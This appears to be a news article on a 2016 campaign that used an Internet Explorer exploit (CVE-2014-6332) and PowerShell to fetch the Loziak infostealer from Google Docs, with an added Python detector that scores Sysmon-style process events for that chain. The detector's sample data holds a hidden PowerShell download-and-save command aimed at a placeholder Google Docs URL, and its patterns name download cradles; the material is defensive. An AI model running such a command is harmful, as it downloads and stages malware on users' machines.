During March 2016, a threat group used a combination of Internet Explorer exploits, Windows PowerShell scripting, and malware hosted on Google Docs to infect targets with the Loziak trojan.
The Loziak trojan surfaced on the malware scene in March 2015, when Symantec observed cyber-espionage groups using it to spy on energy-sector companies in the Middle East.
Loziak is a simple infostealer, regularly used in reconnaissance campaigns when threat groups are gathering information on their target to use in attacks at a later stage.
When a victim using Internet Explorer was tricked into opening a page hosting the malicious code, an exploit for the CVE-2014-6332 vulnerability would run and execute VBScript inside the browser.
All IE versions from 3 to 11 are vulnerable, and the exploit would give the crooks so-called GodMode on the user’s machine. From there, the crooks would use Windows PowerShell scripts to download the Loziak executable from a Google Docs URL.
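As an added illustration, not code from the original article or from the researchers it cites, the following Python scores the process chain described above (Internet Explorer spawning PowerShell, which fetches a payload from a Google Docs URL) over constructed Sysmon-style process-creation events. The field names follow Sysmon Event ID 1; the command lines, file paths and the PLACEHOLDER document id are sample values, not real telemetry.

```python
import re
from typing import Dict, List, Tuple

# Constructed process-creation events in the shape of Sysmon Event ID 1 fields.
# The command lines and the PLACEHOLDER document id are sample values, not real telemetry.
SAMPLE_EVENTS: List[Dict[str, str]] = [
    {   # the chain from the article: IE -> PowerShell -> fetch from Google Docs
        "ParentImage": r"C:\Program Files\Internet Explorer\iexplore.exe",
        "Image": r"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe",
        "CommandLine": "powershell -nop -w hidden -c \"(New-Object Net.WebClient)"
                       ".DownloadFile('https://docs.google.com/uc?id=PLACEHOLDER','%TEMP%\\a.exe')\"",
    },
    {   # benign: an admin running PowerShell from the desktop shell
        "ParentImage": r"C:\Windows\explorer.exe",
        "Image": r"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe",
        "CommandLine": "powershell -c Get-ChildItem C:\\Users",
    },
    {   # partial: the browser spawned a shell, but there is no download cradle or URL
        "ParentImage": r"C:\Program Files\Internet Explorer\iexplore.exe",
        "Image": r"C:\Windows\System32\cmd.exe",
        "CommandLine": "cmd /c whoami",
    },
]

BROWSERS = {"iexplore.exe"}
SCRIPT_HOSTS = {"powershell.exe", "cmd.exe", "wscript.exe", "cscript.exe", "mshta.exe"}
CRADLE_RE = re.compile(r"downloadfile|downloadstring|invoke-webrequest|net\.webclient", re.I)
URL_RE = re.compile(r"https?://([^/'\"\s]+)", re.I)  # captures the host part of a URL
DOC_HOSTS = {"docs.google.com", "drive.google.com"}

def basename(path: str) -> str:
    return path.rsplit("\\", 1)[-1].lower()

def score_event(ev: Dict[str, str]) -> Tuple[int, List[str]]:
    """Return (score, reasons); each matched stage of the chain adds one point."""
    reasons = []
    parent, image, cmd = basename(ev["ParentImage"]), basename(ev["Image"]), ev["CommandLine"]
    if parent in BROWSERS and image in SCRIPT_HOSTS:
        reasons.append("browser spawned a script host")
    if image == "powershell.exe" and CRADLE_RE.search(cmd):
        reasons.append("PowerShell download cradle in command line")
    if any(h.lower() in DOC_HOSTS for h in URL_RE.findall(cmd)):
        reasons.append("payload fetched from a document-sharing host")
    return len(reasons), reasons

def find_suspicious(events: List[Dict[str, str]], threshold: int = 2) -> List[int]:
    """Indexes of events whose score reaches the threshold (2 = at least two stages seen)."""
    return [i for i, ev in enumerate(events) if score_event(ev)[0] >= threshold]
```

Lowering the threshold to 1 also surfaces the partial match (a browser spawning a shell with no download), which is useful for hunting but noisier in production.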
Loziak is a perfect reconnaissance tool:
Once Loziak is installed, the trojan immediately starts collecting information on the infected machine. The infostealer gathers the computer’s name, CPU details, RAM size, location (country), and whether the user has any antivirus software installed.
The data is then sent to the crooks’ servers, where it is likely used to prepare further attacks, if those have not already taken place.
Security researchers found it extremely curious that crooks managed to host Loziak on Google’s servers. Google is known to run automated virus scans on all the files hosted on its servers.